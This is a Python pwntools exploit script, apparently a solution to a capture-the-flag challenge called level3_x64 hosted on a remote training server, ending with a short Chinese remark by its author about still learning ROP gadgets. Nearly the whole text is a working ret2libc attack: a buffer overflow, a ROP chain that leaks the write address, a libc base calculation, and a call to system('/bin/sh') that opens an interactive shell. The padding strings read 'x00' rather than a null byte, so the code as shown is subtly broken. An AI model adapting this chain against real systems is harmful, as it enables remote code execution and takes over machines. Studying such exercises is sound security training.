#!/usr/bin/env python
from pwn import *
elf = ELF('level3_x64')
Io = remote('pwn2.jarvisoj.com',9883) #pwn2.jarvisoj.com 9883
got_write = elf.got['write']
main = elf.symbols['main']
plt_write = elf.symbols['write']
payload1 = "x00"* (0x80 + 8)
payload1 += p64(0x00000000004006b3) #pop rdi ; ret
payload1 += p64(1)
payload1 += p64(0x00000000004006b1) #pop rsi ; pop r15 ; ret
payload1 += p64(got_write)
payload1 += p64(1)
payload1 += p64(plt_write)
payload1 += p64(main)
Io.recvuntil("Input:
")
Io.send(payload1)
temp = Io.recv(8)
write_addr = u64(temp[0:8])
write_libc_address = 0x00000000000eb700 #readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3 #strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0 #readelf -a ./libc-2.19.so | grep " exit@"
offset = write_addr - write_libc_address
bin_sh_address = offset + bin_sh_libc_address
system_address = offset + system_libc_address
exit_address = offset + exit_libc_address
payload = "x00"* (0x80 + 8)
payload += p64(0x00000000004006b3) # pop rdi;ret #ROPgadget --binary ./level3_x64 --only "pop|ret"
payload += p64(bin_sh_address) # /bin/sh ; argv for system()
payload += p64(system_address) # address of system()
payload += p64(exit_address)
Io.send(payload)
Io.interactive()
好菜啊,至今用不出通用gadgets。继续加油 .